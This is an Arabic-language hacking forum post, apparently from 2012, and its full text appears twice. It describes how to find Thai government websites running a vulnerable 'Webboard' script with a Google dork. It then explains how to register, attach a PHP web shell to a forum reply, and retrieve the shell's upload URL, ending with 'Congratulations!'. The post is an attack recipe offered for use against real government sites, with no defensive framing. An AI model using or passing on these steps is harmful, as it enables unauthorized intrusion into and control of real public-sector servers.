Iraqe Hacker
08-31-2012, 07:28 PM
السلام عليكم ورحمة الله وبركاته
ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل
اسم السكريبت المصاب: Webboard
Dork:
كود:
site:go.th inurl:name=member+file=index
نقوم بالتسجيل في المنتدى
كود:
http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index
بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:
كود:
http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard
نختار أحد المواضيع لنضيف الرد:
كود:
http://www.xxxxx.go.th/index.php?name=we...read&id=49 (http://www.xxxxx.go.th/index.php?name=webboard&file=read&id=49)
http://www.xxxxx.go.th/?name=webboard&file=read&id=49
أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:
http://i50.tinypic.com/k3wu82.jpg
بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:
http://i49.tinypic.com/2z6bbwk.jpg
والرابط يكون مثل هذا:
كود:
http://www.xxxxx.go.th/webboard_upload/1...adspot.php (http://www.xxxxx.go.th/webboard_upload/1340890810_madspot.php)
مبروك !
ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل
اسم السكريبت المصاب: Webboard
Dork:
كود:
site:go.th inurl:name=member+file=index
نقوم بالتسجيل في المنتدى
كود:
http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index
بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:
كود:
http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard
نختار أحد المواضيع لنضيف الرد:
كود:
http://www.xxxxx.go.th/index.php?name=we...read&id=49 (http://www.xxxxx.go.th/index.php?name=webboard&file=read&id=49)
http://www.xxxxx.go.th/?name=webboard&file=read&id=49
أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:
http://i50.tinypic.com/k3wu82.jpg
بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:
http://i49.tinypic.com/2z6bbwk.jpg
والرابط يكون مثل هذا:
كود:
http://www.xxxxx.go.th/webboard_upload/1...adspot.php (http://www.xxxxx.go.th/webboard_upload/1340890810_madspot.php)
مبروك !